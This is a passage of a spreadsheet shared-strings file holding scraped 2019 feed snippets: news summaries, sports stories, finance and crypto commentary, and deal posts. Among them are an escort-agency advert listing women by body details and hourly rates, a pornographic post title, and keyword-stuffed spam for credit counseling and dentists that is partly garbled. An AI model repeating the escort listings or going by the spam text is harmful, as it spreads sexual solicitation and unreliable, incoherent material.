    <t>A Sydney judge accepted the former Leighton Holdings chief financial officer was a "broken man" who was unlikely to reoffend.</t>
  </si>
  <si>
    <t>aussieBum</t>
  </si>
  <si>
    <t>50% off aussieBum favourites For a very limited time, aussieBum’s most popular products are yours HALF PRICE. That’s right! This is your chance to slip into our most coveted ranges at a ridiculously reduced rate. (Some might call it ridiculous – we call it fun!) Classic Original underwear now $9.98AUD (was $19.95AUD) CottonSoft underwear now $11.98AUD (was $23.95AUD) Rian underwear now $14.48 (was $28.95AUD) EnlargeIt underwear now $12.98 (was $25.95) and more and more… Terms &amp; Conditions: Starts from 26th July Friday 1pm AEST. Ends on 29th July Monday 1pm AEST. Selected items only (see our website for details). While stocks last.</t>
  </si>
  <si>
    <t>Alan Filby is handing the business over to his son but will still pop in to help. Read more? Click here</t>
  </si>
  <si>
    <t>A New York police officer was found dead at his Staten Island home on Saturday after shooting himself in what was the fifth police suicide in the city since June, officials said. Officials did not immediately release the officer’s name, rank or tenure with the department, however the Sergeants Benevolent Association said in a tweet that it was a sergeant who died. “Once again terrible news,” the message said. “Tonight the NYPD lost a sergeant to suicide. We ask that everyone pray for his family, friends and Co-workers. The NYPD continues to go through a difficult time.” The news underscored the Police Department’s ongoing struggles with mental health. More police officers commit suicide every year in New York City than are killed in the line of duty. Several suicides have come this summer. On June 5, Deputy Chief Steven J. Silks shot himself in his police vehicle. The next day, Detective Joseph Calabrese took his own life. Officer Michael Caddy fatally shot himself near his Staten Island precinct station house on June 14, and on June 26, Officer Kevin Preiss was found dead at his home in Long Island. In June, Commissioner James P. O’Neill declared a mental-health crisis and told officers they could get confidential help from department chaplains, from peer-support groups and from phone and text message hotlines. “There is no shame in seeking assistance from the many resources available both inside and outside the department,” Commissioner O’Neill said in a message to his 36,000 officers on June 14. “Accepting help is never a sign of weakness — in fact, it’s a sign of great strength.” But Robert J. Louden, a professor emeritus of criminal justice and homeland security at Georgian Court University in New Jersey, said that officers often believe they are supposed to provide help — not seek it themselves. “The nature of the personality is that it’s a sign of weakness, it’s a sign of shame, to go for help,” he said on Saturday. “That kind of holds them back.” Mr. Louden, who was a member of the Police Department for more than 20 years, said the suicides mirrored police suicides across the country this year. “You’re always trying to make sense out of nonsense,” he said. “There’s a lot of good feelings and a lot of helping feelings, but there’s also a lot of down feelings.” Source link</t>
  </si>
  <si>
    <t>Welcome to escorts in Claypits CT3, covering the whole area of Kent. We have escorts serving the flats, homes and local hotels in Claypits and the surrounding Kent areas. Claypits Escort Kent Escort Services Claypits Escorts - Girls Who Know How to Fulfill You in Kent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Claypits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Claypits escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. Escorts in Claypits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Claypits,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Gillian Location: Claypits (CT3 1) Nationality: English Spoken Language: English, French Age: 28 years old Weight: 63.6kg (140lb) (10st - 0lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 39 Hair Leigh: Long Hair Color: Blonde Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Claypits Outcall: Kent Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Gillian Escort Name: Natasha Location: Claypits (CT3 1) Nationality: Lithuanian Spoken Language: English, Thai Age: 20 years old Weight: 67.7kg (149lb) (10st - 9lb) Height: 5 feet 5 inches (165.10cm) Dress Size: XS Shoe Size: 38 Hair Leigh: Long Hair Color: Red Eye Color: Brown Breast: Natural Breast Size: DD Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: Claypits Outcall: Kent Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Natasha Escort Name: Leilani Location: Claypits (CT3 1) Nationality: Israeli Spoken Language: English, French Age: 24 years old Weight: 55.5kg (122lb) (8st - 10lb) Height: 5 feet 10 inches (177.80cm) Dress Size: S Shoe Size: 37 Hair Leigh: Short Hair Color: Natural Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Claypits Outcall: Kent Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Leilani Escort Name: Prue Location: Claypits (CT3 1) Nationality: British Spoken Language: English, German Age: 24 years old Weight: 65.0kg (143lb) (10st - 3lb) Height: 5 feet 7 inches (170.18cm) Dress Size: S Shoe Size: 40 Hair Leigh: Long Hair Color: Red Eye Color: Green Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: No Smoking: Yes Drinking: Occasionally Availability Area: Claypits Outcall: Kent Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Prue Escort Name: Celestina Location: Claypits (CT3 1) Nationality: English Spoken Language: English, Czech Age: 28 years old Weight: 46.4kg (102lb) (7st - 4lb) Height: 5 feet 4 inches (162.56cm) Dress Size: S Shoe Size: 46 Hair Leigh: Short Hair Color: Brown Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Claypits Outcall: Kent Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Celestina Escort Name: Lola Location: Claypits (CT3 1) Nationality: American Spoken Language: English, Arabic Age: 28 years old Weight: 62.7kg (138lb) (9st - 12lb) Height: 5 feet 7 inches (170.18cm) Dress Size: L Shoe Size: 37 Hair Leigh: Long Hair Color: Brown Eye Color: Green Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: Occasionally Availability Area: Claypits Outcall: Kent Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Lola Escort Name: Dana Location: Claypits (CT3 1) Nationality: British Spoken Language: English, Bengali Age: 43 years old Weight: 56.8kg (125lb) (8st - 13lb) Height: 5 feet 7 inches (170.18cm) Dress Size: M Shoe Size: 42 Hair Leigh: Very Long Hair Color: Burnt Orange Eye Color: Blue Breast: Silicone Breast Size: C Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: Yes Smoking: Occasionally Drinking: Yes Availability Area: Claypits Outcall: Kent Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Dana Escort Name: Yolanda Location: Claypits (CT3 1) Nationality: English Spoken Language: English, German Age: 25 years old Weight: 55.5kg (122lb) (8st - 10lb) Height: 5 feet 10 inches (177.80cm) Dress Size: S Shoe Size: 37 Hair Leigh: Short Hair Color: Sapphire Eye Color: Blue Breast: Natural Breast Size: A Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: Occasionally Drinking: No Availability Area: Claypits Outcall: Kent Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Yolanda Claypits Horny Escort, Claypits Scottish Escort, Claypits Massage Escort, Claypits Agency Escort, Claypits Blonde Escort, Claypits Polish Escort, Claypits Incall Escort, Claypits Indian Escort, Claypits Independent Escort, Claypits Brunette Escort, Claypits Male Escort, Claypits Young Escort, Claypits Walsh Escort, Claypits Ebony Escort, Claypits Busty Escort, Claypits Best Escort, Claypits Bisexual Escort, Claypits Female Escort, Claypits French Escort, Claypits Asian Escort, Claypits Outcall Escort, Claypits Teen Escort, Claypits Gay Escort, Claypits Black Escort, Claypits Mature Escort, Claypits Spanish Escort, Claypits Erotic Escort, Claypits Irish Escort, Claypits Indian Escort, Claypits Brazilian Escort, Claypits Porn Escort, Claypits Chinese Escort, Claypits British Escort, Claypits Cheap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Claypits appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>The Knicks have lost four guys – Mario Hezonja, DeAndre Jordan, Emmanuel Mudiay and Noah Vonleh – who played at least 1,000 minutes. They added seven, and all seven started at least 28 games last season. Of course, how many of those seven are difference makers is up for debate, as is the idea of whether the Knicks should have used at least some of their cap space to take on bad contracts — often spiced up with future picks — from other teams. How does the Nets’ roster shake out after all those moves? The Nets lost as many players (6) who played at least 1,000 minutes last season as they gained. But they added four of the 31 2,000-minute players to have changed teams this summer, most notably in Kevin Durant and Kyrie Irving. Utah (3) is the only other team with more than two additions that played at Keep reading this article on NBA.COM - NBA.</t>
  </si>
  <si>
    <t>Roger Vaughan</t>
  </si>
  <si>
    <t>Richmond expect captain Trent Cotchin to play in Friday night’s AFL blockbuster against Collingwood as he nervously awaits the birth of his third child.</t>
  </si>
  <si>
    <t>The Shanghai-listed company will become the lithium miner’s single-biggest shareholder with a 19.4 per cent stake.</t>
  </si>
  <si>
    <t>Houses near a Waitrose are worth 12% more than average – and now three of its supermarkets have been sold to Lidl. But the discounter’s arrival might not be all bad news …Waitrose has sold off three of its supermarkets to Lidl, sparking a wave of middle-class outrage. It’s not just concern about access to venison meatballs or pistachio ice-cream – residents of Bromley in London, Oadby in Leicestershire and Wollaton in Nottinghamshire apparently fear their house prices could take a dive.Kal Kandola, 49, told the Telegraph: “We are regulars at Waitrose and not very happy about this at all. I have houses in Wollaton that I rent out. The issue of house prices is a concern as Wollaton is an affluent area.” Continue reading… Read More</t>
  </si>
  <si>
    <t>Paul Donoughue</t>
  </si>
  <si>
    <t>How many episodes do we have to sit through before something happens? Should I just binge the new season of Queer Eye instead?</t>
  </si>
  <si>
    <t>Wellcome Trust chair warns Boris Johnson that Britain will lose out if it “amputates” the EU. Read more? Click here</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. China Approves 13 New Ivanka Trump Trademarks In 3 Months Friday 19 July 2019 11:32 PM UTC-05 http://creditcounselingconsumer.home.blog/plymouth-minnesota-consumer-credit-counseling-service-888-551-1270/ Ivanka Trump's brand continues to win foreign trademarks in China and the Philippines, adding to questions about conflicts of interest at the White</t>
  </si>
  <si>
    <t>Tara Cassidy</t>
  </si>
  <si>
    <t>A 23-year-old Wide Bay man is charged with dozens of offences, after allegedly leading police on a 200-kilometre pursuit, carjacking several people, and stabbing a woman earlier this month.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190728/p9#a190728p9 In an update to a previous report, Ming-Chi Kuo now says that all three new iPhones coming in 2020 will support 5G (Juli Clover/MacRumors) Juli Clover / MacRumors: In an update to a previous report, Ming-Chi Kuo now says that all three new iPhones coming in 2020 will support 5G — The three iPhones expected to launch in 2020 will feature support for 5G, according to a new note to investors shared today by Apple analyst Ming-Chi Kuo and obtained by MacRumors. Source: http://www.techmeme.com/190728/p9#a190728p9 The post In an update to a previous report, Ming-Chi Kuo now says that all three new iPhones coming in 2020 will support 5G (Juli Clover/MacRumors) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>submitted by /u/gRm9 [link] [comments] Apple lost the 5G battle, but it paid Intel $1 billion to win the war</t>
  </si>
  <si>
    <t>Henoch</t>
  </si>
  <si>
    <t>Etsy, the global marketplace for handmade and vintage items, has acquired Reverb. This is a six-year old company that enables people to buy and sell new, used, and vintage music gear. The deal is for about 246 million euros in cash. According to the official press release, Reverb will continue… Continue reading</t>
  </si>
  <si>
    <t>A South Australian police dog handler and his dog are getting the chance to retire at the same time.</t>
  </si>
  <si>
    <t>The Time Peter Crouch Decided To Crash Into Dirk Kuyt Over Xabi Alonso Peter Crouch has a quite brilliant story of how he and the rest of the Liverpool squad went on a go-karting outing ahead of the Champions League final and things went a bit wrong. In 2007, a week before the big game against AC Milan, Rafa Benitez’s side went to Portugal for a training camp and the players went to a go-karting track. Crouchy spiralled a little out of control and with no ability the brakes on, was resigned to crashing into one of his teammates – it was an inevitability. Image: PA But as the big man explained, he had to choose between crashing into the midfield metronome Xabi Alonso, or hitting workhorse Dirk Kuyt and simply going off who was more important to the team, he swerved into the Dutchman in an incident he called “quite dangerous”. :speaking_head: One-On-One @petercrouch explains how he nearly ran @Kuyt over before the #UCL final :see_no_evil: :video_camera: Follow the link to watch the full video now! pic.twitter.com/U8NIEVKlJm – FourFourTwo :soccer: (@FourFourTwo) December 12, 2017 Telling the brilliant story i an interview with Four Four Two, Crouch said: “I think it was before the Champions League final. I think we were in Portugal, we had a week before the game and we went away and we were training and we went go-karting. “Went out, obviously going around the track and I’ve come in, I’ve flown into the pit obviously where we stop. I thought right I’ll just brake now. No brakes whatsoever. “I’m just coming into the pit and I’ve seen [Xabi] Alonso and I’ve seen Kuyt and I thought who’s more valuable? “So I’ve swerved into Kuyt and fair play to him he literally jumped with his legs like that [gestures to the side] and I’ve gone straight through him. “God’s honest truth it was quite dangerous, but obviously I can laugh about it now because I didn’t cause any injury.” Fortunately Kuyt did not sustain an injury but Liverpool would end up losing the final in Athens. Filippo Inzaghi bagged two to put the Rossoneri 2-0 up and Liverpool only replied once, through Kuyt. This post The Time Peter Crouch Decided To Crash Into Dirk Kuyt Over Xabi Alonso appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Alex Bregman Wins 2018 MLB All-Star Game MVP Monday 29 July 2019 11:14 AM UTC-05 | Tags: credit-counseling https://m.youtube.com/watch?v=78razbm4ugY 10th-inning homer earns Bregman All-Star MVP Houston Astros third baseman Alex Bregman was named the 2018 MLB All-Star Game MVP after he smashed a go-ahead solo home run in the top of the 10th inning Tuesday night at Nationals Park in Washington, D… Tags: credit-counseling</t>
  </si>
  <si>
    <t>Team Blogger</t>
  </si>
  <si>
    <t>Keep reading this article on NFL Gridiron Gab. Linebacker Andre Branch found a new home Tuesday, signing a one-year contract with the Arizona Cardinals, Jelani Scott of NFL.com reports. Branch had been</t>
  </si>
  <si>
    <t>A police chief in Romania is fired after the murder of a girl whose emergency calls were ignored. The post Romania police chief sacked after teen ‘killed by kidnapper’ appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Heather McNeill</t>
  </si>
  <si>
    <t>The average weekly cost to own a car in WA has risen to $215 a week, according to an RAC survey.</t>
  </si>
  <si>
    <t>Deborah Snow</t>
  </si>
  <si>
    <t>The area that includes the oldest continuously surviving tropical rainforests on earth is facing its equivalent of the Great Barrier Reef's coral bleaching.</t>
  </si>
  <si>
    <t>Police say the group of women were approached by an armed man and fearing for their safety, they handed over cash.</t>
  </si>
  <si>
    <t>ETH/USD bears managed to push the price below $210 support. Strong resistance is created by $218-$221 area. Ethereum, the second-largest cryptocurrency with the current market capitalization of $21.9 billion, is hovering marginally above critical $200,00. The coin tested this area during early Asian hours; however, this barrier remains unbroken so far. ETH/USD is moving within a bearish trend in sync with Bitcoin (BTC) and the rest of the cryptocurrency market. At the time of writing, ETH/USD is changing hands at $204.34, down 5% on a day-on-day basis. Read also: Ethereum 2.0 January 3, 2020 launch date remains unconfirmed Ethereum’s technical picture ETH/USD hit the recent high at $135.71 on July 20 and has been moving down ever since. On the intraday timeframe, ETH/USD is supported by psychological $200,00. Once it is out of the way, the sell-off is likely to gain traction with the next focus on $186 created by SMA200 (Simple Moving Average) on a daily chart. It is followed by the lower line of the 1-day Bollinger Band at $174.80. On the upside, the initial resistance comes at $211.40 (the middle line of 1-hour Bollinger Band) and $215.50 (SMA50 1-hour). We will need to see a sustainable move above this area for the upside to gain traction with the next focus on $218.50 (confluence of the middle line of 4-hour Bollinger Band and SMA50). Then comes $220 (the upper line of 1-hour Bollinger Band) and $221 (SMA200 1-hour). Considering the downward-looking Relative Strength Index (RSO), the bear case scenario looks more likely. ETH/USD 4-hour chart</t>
  </si>
  <si>
    <t>Two fringe Ashes candidates have exposed potential frailties among Australia’s batsmen on a lively pitch in the intra-squad match in Hampshire.</t>
  </si>
  <si>
    <t>Legendary West Indies fast bowler Sir Curtly Ambrose talks us through the pace attacks of England and Australia before the Ashes series gets under way on Thursday. Read more: ‘I’d be quietly confident bowling to England’s top three’ – the Glenn McGrath column</t>
  </si>
  <si>
    <t>When Slack suffered a crippling 64-minute outage this morning, the downtime did more than just enrage users and resurrect the #Slackdown hashtag. It also ignited a $550 million plunge in Slack stock (NYSE: WORK). 64 Minutes of Virtual Office Pain The outage, as CCN reported, began at roughly 10:50 am ET and lingered for more than an hour. Initially, the communications app struggled with slow loading times and messages that refused to send, though users later reported an inability to access their workspaces at all. #Slack is down for a nanosecond… Twitter… pic.twitter.com/LmHYEquddV — Where in the world is Ross Sandiego? (@beet_keeper) July 29, 2019 Slack had resolved the issue by the time most East Coast users had gone on their lunch breaks, but there’s one place the problem hasn’t disappeared: the New York Stock Exchange. Slack Stock Tumbles, Market Cap Evaporates Slack shares had already stumbled out of the gate, and the decline worsened as word of the outage spread. WORK ultimately slipped as low as $32.51 – a 4.7% decline from Monday’s open at $34.10. Heading toward the closing bell, Slack stock trades at $33.00 for a decline of 3.2%. WORK shares shed more than 3% on Monday. | Source: Yahoo Finance While not severe from a per-share standpoint, that translates into a $550 million market cap wipeout for the Silicon Valley darling. That’s nearly $8.6 million for every minute that Slack was down. The outage and corresponding valuation plunge are emblematic of what has been a painful month for Slack, which had been one of the year’s most highly-anticipated IPOs prior to its NYSE debut a month ago. Though technically trading well above their $26 IPO price, WORK shares have plummeted 15% from their initial close at $38.62. They’ve also crashed more than 21% since peaking at $42 on that same day.</t>
  </si>
  <si>
    <t>Ottawa: The Conservative Party of Canada has set a new Canadian political fundraising record for Q2, and for the first six months of any year. The Conservatives raised over $8.5 million from more than 53,000 Canadians – the best Q2 ever, including in 2011 during a majority winning election campaign. This brings the total to over $16.5 million in the first six months of 2019 – nearly $1 million better than 2011, and nearly $3 million better than 2015. The 53,294 individual donors is also a record Q2. “We’re now less than 90 days until Election Day, and these fundraising results show that momentum is firmly on our side,” said Andrew Scheer, Leader of Canada’s Conservatives. “With Canadians clearly showing their support for our party, we’re going to continue to outline our plan that helps all Canadians get ahead.” With $8,532,334 raised from 53,294 donors, it is an improvement of over $300,000 from the previous Q2 record in Canada. It is the second quarter in a row with over 50,000 donors – something no other political party has done since 2015. “More and more Canadians are realizing that Justin Trudeau is simply not as advertised,” continued Scheer. “Canadians are tired of the scandals and the broken promises. They’re looking for a new government that will live within its means and leave more money in their pockets so they can get ahead.” Top Q2 donation totals, any Canadian political party: 2019 – Conservative Party – $8,532,334 2011 – Conservative Party – $8,205,079 2015 – Conservative Party – $7,368,976 Top first six months donation totals, any Canadian political party: 2019 – Conservative Party – $16,543,195 2011 – Conservative Party – $15,575,184 2015 – Conservative Party – $13,671,894</t>
  </si>
  <si>
    <t>/u/AlmostChaseRice</t>
  </si>
  <si>
    <t>submitted by /u/AlmostChaseRice [link] [comments] The post Young Guy Fucks MILF while Husband Tapes appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>GRAND THEFT AUTO V source The post Grand Theft Auto V_2019 Bodybuilding Beach Drama lol appeared first on Health Figure Store.</t>
  </si>
  <si>
    <t>“Have you Kaplowitz’d to-day?” GTO Cigars Don Emilio Edicion Limitada WRAPPER: Dominican, U.S. Connecticut Shade BINDER: Dominican FILLER: Dominican FORMAT: Perfecto (654) segmented double wrapper ORIGIN: Tabacalera GTO Dominicana STRENGTH: Mild-Medium WEBSITE: www.gtodominicancigars.com &gt;&gt;&gt; NOTES: Orange Julius. White chocolate. Pepper-spiced w/ white peppercorn, cardamom, white clove. Those are the top notes in a very particular order. Creamy and smoothly meditatively calm. Undertones are buttery bits of earthiness steered by natty 'baccy, influenced by a tick of graham flour &amp; cashew butter. A mid-point cocoa butter bulges that midsection alongside a white mocha. Underbelly is chicken coop and bright clay. Lightly toasted oats. Charming &amp; rather easily-breezily gregarious. Burns slow &amp; even. Pulls the same way. Ash is dense and pale -- like I like mah wiminz. Seams, cap assemblage, and packing all are crafted &amp; hold together excellently. Less than a moderate smoke out-put but yields a darn charming sweet-savory room-note. FINAL GRADE: A- A 90-100 B 80-89 C 70-79 D 60-69 F 0-59 ###</t>
  </si>
  <si>
    <t>You need to be just as active with your income as your spending.</t>
  </si>
  <si>
    <t>While tech companies continue to rocket on a sniff of good news, Aussie success story Cochlear says a good story is needed to find patient investors.</t>
  </si>
  <si>
    <t>If you are a caring, out going person that wants to help people lead a healthy lifestyle, this may be the job for you! We are looking for someone to work as a receptionist/laser tech . It will require various shifts, Monday and Friday 8:30-12, and 2-6. Tuesday 2:30 to 8 and Thursday 1:30-8. Starting .. Read more</t>
  </si>
  <si>
    <t>WHAT A BEAUTIFUL PLACE #BARCELONA #SPAIN #TRAVEL #TOUR The post WHAT A BEAUTIFUL PLACE #BARCELONA #SPAIN #TRAVEL #TOUR appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Jesse Thomas</t>
  </si>
  <si>
    <t>Quinpool Road reopens but where are the bike lanes?</t>
  </si>
  <si>
    <t>Clients at a Burlington dental clinic are being advised to get tested for infectious diseases after possibly being exposed to dirty equipment.Patients at Upper Middle Dental. KDKA Pittsburgh CW Day – Young Boy Allegedly Raped Near Local Care. PTL: Pittsburgh Dental ClinicCall to Care, Inc. is hosting Mission of Mercy. Top Dental Clinic In Halton Hills Ontario Here is the definitive list of Halton Hills's top undefined as rated by the Halton Hills, ON community. Want to see who made the cut? Menu Close Refer a friend. Get $50. For Dentists About Us Careers. Top Dentist In Halton Hills Ontario Acton咖啡店：查看 TripAdvisor 上關於加拿大. Prev Next Leave a Reply Cancel reply Menu Home Most Popular Dental Clinic Near Halton Hills Looking for a dentist in Haltom City? Admire Dental is a renowned dental care clinic that offers a range of friendly, Watauga, Saginaw, Richland Hills, Fort Worth and Surrounding Area We invite you to explore our website to learn more about our office, the If. The Best 10 Orthodontists near Georgetown, Halton Hills, ON Showing The Best Dentists in Halton Hills Handpicked Top 3 Dentists in Halton Hills, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Cosmetic Dental Clinic Near Halton Hills Ontario 为您提供与 Oakville 相关的域名和网站信息，帮助您从域名应用的角度更好的了解域名是如何被使用的，为您使用域名提供参考依据。 Top Dentist In Halton Hills Top cities in United States Washington, D.C. Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as. Find the best Dentist in Halton Hills, ON. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local Dentist you are looking for. Best Orthodontists in Georgetown, Halton Hills, ON – Market Place Dental Centre, Iain Meldrum, BSc, DDS, MSc, FRCD c, Smile Solutions Orthodontists, Align Orthodontics, Diana Dental, Growing Beautiful Smiles, Heritage Orthodontics, Smile House. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana M. Sawiak, Best General Dentistry in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, King’s Cove Family Dental, Trenton A W Denturist, Diana Dental, Pownall Janet, DDs – Still Waters Dental, Lefebvre Ronald, KDKA News Update 7/26 2pm – 11 hours ago KDKA-TV Evening Forecast (7/26)Stay on top of local weather with meteorologist. 12 hours ago Mission of Mercy.</t>
  </si>
  <si>
    <t>This is not the time to go for growth. This is the time to conserve your energy to build muscle and that is what we have done, says Dinanath Dubhashi, MD &amp;CEO, L&amp;T Finance Holdings. Excerpts from an interview with ETNOW. You have reported a growth of 20% while profits were up 1.7%. What was the profit growth and what was the driver for the quarter gone by? I would like to put this result in perspective. The first quarter of FY20 has been one of the more difficult quarters for the NBFC industry as such. There are no two ways about that. What are the three difficulties that the industry has faced? Number one illiquidity. Number two is growth in the core sectors, growth in car growth or tractor growth or two-wheeler growth in the core sector and the last is certain news, rumours, etc, about some of the names, some downgrades, defaults happening. It has been three-fold bad news coming for the sector. Let us talk about each one of them and you will see our results in that perspective. The first is liquidity. In very short, we have been able to raise good amount of funds, diversify our borrowings to retail and to foreign and most importantly keep our gaps positive and maintain about Rs 5,000 crore of liquid assets on our book. At the same time, the cost of funds has gone up marginally by just about 6 bps. So, liquidity has been maintained. Second, definitely, there has been a growth momentum in the rural market. The housing market everywhere has been slow. We are happy to say that we have been able to maintain or even grow market share. Having said that, what we have ensured first is asset quality. We have always maintained our asset quality best and that can be seen from falling NPAs. Second is we have maintained margins and growth has been one of the results. We have not run after growth. This is not the time to run after growth. Growth can come based on the strengths that you build in our business fundamentals. This is not the time to go for growth. This is the time to conserve your energy to build muscle and that is what we have done. The three SPVs of IL&amp;FS has turned green. Is this your total exposure to the troubled assets? Two names were discussed in the last nine to twelve months. One was IL&amp;FS and we have been coming and talking about IL&amp;FS every quarter. You will remember that out of our Rs 1,800-crore exposure, our two projects of Rs 180 crore or so were green and the rest were amber. We are very happy to say that because of our team’s effort, working closely with IL&amp;FS and Government of India, now five out of six projects and close to Rs 1,700 crore out of Rs 1,800 crore of total exposure is becoming green. We are hopeful that in the near future, the remaining Rs 100 crore will also become green. If you remember, we had reversed Rs 84 crore of income in the fourth quarter. We have reinstated that income in this quarter because now everything is green and money will start flowing. The entire due on these projects of the entire lending community, almost three times that money is already sitting in the escrow account. So there is absolutely no problem in receiving that money and hence we have reinstated that income. As opposed to that, even though I will not be able to say the name in public, a particular housing finance company which at one point of time was AAA and now rated default having defaulted in the near past, we have exposure of close to Rs 550 crore plus interest to the securities of this company. We have conservatively taken a provision of 50% — which is Rs 284 crore — on this entire exposure. We believe this is a conservative view. We are closely associated with all the efforts going on either with the banks to restructure their loans or attempts going on to sell the company. We believe that eventual loss, if it happens, will be far lower than this 50% provision that we have taken. But as always, conservatively, we have taken this provision. You have weathered difficult environment, you have put to rest a lot of concerns as well in the markets regarding this quarter but regarding IL&amp;FS risk as well as DHFL, what do you want to tell your shareholders? I can say the IL&amp;FS issue is resolved and we have made provision for the housing finance company, so the quarter’s performance has to be seen from the context of how good the company is able to do in a very turbulent quarter and that shows that we have the inherent strengths to not only do well in a turbulent quarter, but even take a one-time hit and still show profits of about Rs 550 crore that we have shown. The model we have built is a very durable and strong model and profit growth in the future will surely come once the overall industry starts turning and our growth gets even better. Your asset quality has improved 1.6% sequentially. What has led to this improvement? Which are the segments that are overall doing better and what are the asset quality trends we can see? I can answer it in two different segments; in housing segment, our GNPA shows pretty steady performance. In the rural segment, for the last three years, we have been showing a steady drop by doing the basic things right. Instead of concentrating on GNPA, we have concentrated on good sourcing, early defaults and making sure that our zero DPD continuously goes up. By concentrating on early delinquency, slowly the overall GNPA comes down. It squeezes as you solve GNPA and concentrate on early delinquencies as roll forward into GNPA continuously comes down and our rural book is now in that good space. On the wholesale side, you will see a big reduction from last year and that has happened because the entire legacy portfolio had moved to a special team about one, one and a half years back and we are seeing the results of that. A concentrated effort on reducing this GS-3 has led to that. We are further focussing on our rural business, on our housing business and within wholesale, we will be further focussing now on only our infra business. We are putting our structured finance and DCM books in de-focus and by seeing the success of the special team in running down de-focussed businesses, solving GS-3 etc, they will be running down this book also and we are sure that they will be able to do this without any effect on P&amp;L. How do you see yourself benefitting from the transfer of the three cases that is IL&amp;FS and SPVs from Amber to green category? Can we expect provisioning write-backs in the coming quarters? We have not made any provisions on IL&amp;FS. We were always sure that we do not have to take any principal provisions and so we have not made any provisions. We had deferred interest in the fourth quarter of last year which we have reinstated this quarter. We expect IL&amp;FS now to be a normal standard asset our SPVs and go on from there. What is the type of exposure in the developer loan book and what are the asset quality trends that you see there? Developer lending or real estate lending is not everybody’s job, it is not an easy job, even in normal circumstances. Most definitely the real estate industry has suffered and has gone through difficulties because of demonetisation, RERA, the GST issues and then finally lack of liquidity of financers to the developer industry. So many issues have caused a severe slowdown with many projects being half completed or abandoned. Why I say it is not everybody’s job is because you need to have that right DNA to do this. There are a few companies around which have the right DNA and we, being a subsidiary of Larsen &amp; Toubro Group, which is one of the largest construction companies and also a developer of real estate, have the right knowledge to do this. It is very simple. Choose the right developers, the right projects and most importantly your disbursement and your monitoring of projects should be very strictly done. You do not just give the money to a developer and then sit in your office and hope it will get back. Make sure you are on the project, make sure that the project is going well, progressing well. We are doing that. We concentrate mostly now on A and A plus category of developers. This quarter, almost 90% of our new disbursements are for completing our own projects. Very little is for any new development. We will concentrate on completing our own projects. The good thing about our construction funding is that we are solo funders in almost 97% of our exposure. We are not worried about somebody else not being able to fund and hence the project slowing down. READ SOURCE The post In Q2, 90% of L&amp;T Fin’s new disbursements are for completing own projects: Dinanath Dubhashi appeared first on BusinessTelegraph.</t>
  </si>
  <si>
    <t>Optimus Prime</t>
  </si>
  <si>
    <t>Good price drop on this item. I picked one up earlier today. For the price its well made and fits my tools including a hammer. Description The STANLEY Tool Belt is built with 600 denier fabric for long lasting durability and multiple pockets for maximum organisation. This is a perfect belt to hold accessories that can be mixed to create a personalised combination suited to the individuals needs. 600 Denier Fabric for durability Padded back for extra comfort Handle and optional shoulder strap allow carrying it wherever needed Tape measure pocket Integrated metal hammer loop</t>
  </si>
  <si>
    <t>Cloudream</t>
  </si>
  <si>
    <t>Original Coupon Deal AMD Ryzen 3700X Note: Estimated delivery between Fri. 23 Aug. and Tue. 27 Aug.</t>
  </si>
  <si>
